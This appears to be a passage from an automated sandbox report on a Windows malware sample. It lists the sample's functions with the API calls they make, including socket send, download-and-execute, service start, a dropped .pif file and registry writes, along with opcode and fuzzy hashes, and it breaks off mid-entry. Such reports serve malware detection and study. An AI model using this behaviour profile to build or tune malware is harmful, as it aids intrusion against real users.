                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00409258
                                                                                                                                                                      • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                                                                                                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                      • Part of subcall function 00404E26: FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                                                                                                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2435342581-0
                                                                                                                                                                    • Opcode ID: 3bbaf31890dd6242682e5e07faa201dc08710538f861cb005962278dfb94d46e
                                                                                                                                                                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                                                                                                                    • Opcode Fuzzy Hash: 3bbaf31890dd6242682e5e07faa201dc08710538f861cb005962278dfb94d46e
                                                                                                                                                                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                                                                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 276877138-0
                                                                                                                                                                    • Opcode ID: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                                                                                                                                                    • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                                                                                                                    • Opcode Fuzzy Hash: 38ff3efd75794608fc7efc6ab14161dff6b0215efc9cafdd27725548e5e732cb
                                                                                                                                                                    • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0045243C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 004524D5
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004524FE
                                                                                                                                                                    • GetACP.KERNEL32 ref: 00452513
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                    • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                                                                                                    • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                                                                                                                    • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                                                                                                    • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                                                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                    • String ID: SETTINGS
                                                                                                                                                                    • API String ID: 3473537107-594951305
                                                                                                                                                                    • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                                                                                    • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                                                                                                                    • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                                                                                    • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040966A
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                                                                                                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1157919129-0
                                                                                                                                                                    • Opcode ID: aab8e92aab89f970816b537945c8c112a0cd0b9269506920a05a315ce3e12cbc
                                                                                                                                                                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                                                                                                                                    • Opcode Fuzzy Hash: aab8e92aab89f970816b537945c8c112a0cd0b9269506920a05a315ce3e12cbc
                                                                                                                                                                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00452610 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                                                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32 ref: 0045271C
                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004527ED
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 745075371-0
                                                                                                                                                                    • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                                                                                                    • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                                                                                                                    • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                                                                                                    • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00408811
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1771804793-0
                                                                                                                                                                    • Opcode ID: 75b65f607d792d52f34316752de1fd7853d36492c566295496bb9fdd633a2def
                                                                                                                                                                    • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                                                                                                                                    • Opcode Fuzzy Hash: 75b65f607d792d52f34316752de1fd7853d36492c566295496bb9fdd633a2def
                                                                                                                                                                    • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DownloadExecuteFileShell
                                                                                                                                                                    • String ID: C:\Users\Public\Libraries\lhgtogaW.pif$open
                                                                                                                                                                    • API String ID: 2825088817-2145912792
                                                                                                                                                                    • Opcode ID: aa50fa4efe4b457d90f84c17bd40ba8e8b246b1395fac93a92fcf4a5b43489a5
                                                                                                                                                                    • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                                                                                                                                    • Opcode Fuzzy Hash: aa50fa4efe4b457d90f84c17bd40ba8e8b246b1395fac93a92fcf4a5b43489a5
                                                                                                                                                                    • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFind$FirstNextsend
                                                                                                                                                                    • String ID: XPG$XPG
                                                                                                                                                                    • API String ID: 4113138495-1962359302
                                                                                                                                                                    • Opcode ID: cd31781fc752e856dc54509556cc61357d21ae19cd2655f609df1f55b93d954e
                                                                                                                                                                    • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                                                                                                                                    • Opcode Fuzzy Hash: cd31781fc752e856dc54509556cc61357d21ae19cd2655f609df1f55b93d954e
                                                                                                                                                                    • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                                                                                                                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                                                                                                                      • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                                                                                                                                                      • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                    • API String ID: 4127273184-3576401099
                                                                                                                                                                    • Opcode ID: f2c43ad2b54eca36b498e515dc1d07e136ae504e1b99f40133731ebf13c7e4dd
                                                                                                                                                                    • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                                                                                                                    • Opcode Fuzzy Hash: f2c43ad2b54eca36b498e515dc1d07e136ae504e1b99f40133731ebf13c7e4dd
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00451CD8 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00451DBA
                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00451E58
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451EFB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4212172061-0
                                                                                                                                                                    • Opcode ID: d51387d99b1e6b249aff8f61d3989bee7608b3a62aead1fc41d833bb042b57a0
                                                                                                                                                                    • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                                                                                                                                    • Opcode Fuzzy Hash: d51387d99b1e6b249aff8f61d3989bee7608b3a62aead1fc41d833bb042b57a0
                                                                                                                                                                    • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004493AD Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _free.LIBCMT ref: 004493BD
                                                                                                                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32 ref: 004493CF
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 00449447
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 00449474
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 806657224-0
                                                                                                                                                                    • Opcode ID: 633092c3bba77b0065560d4fdbd9d9f897920caf7f9bf618c5d01735725c6ecb
                                                                                                                                                                    • Instruction ID: 1863d2ad967fb4723a60e4ea427cb143a9fbff6035582c54e6546b9b7662ab80
                                                                                                                                                                    • Opcode Fuzzy Hash: 633092c3bba77b0065560d4fdbd9d9f897920caf7f9bf618c5d01735725c6ecb
                                                                                                                                                                    • Instruction Fuzzy Hash: E1312570908201EFDB18DF69DE8086EBBB8FF0572071442AFE054973A1D3748D42DB18
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4137990797.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                    • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                                                                                                    • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                                                                                                                                    • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                                                                                                                    • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C60E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 274C61DA
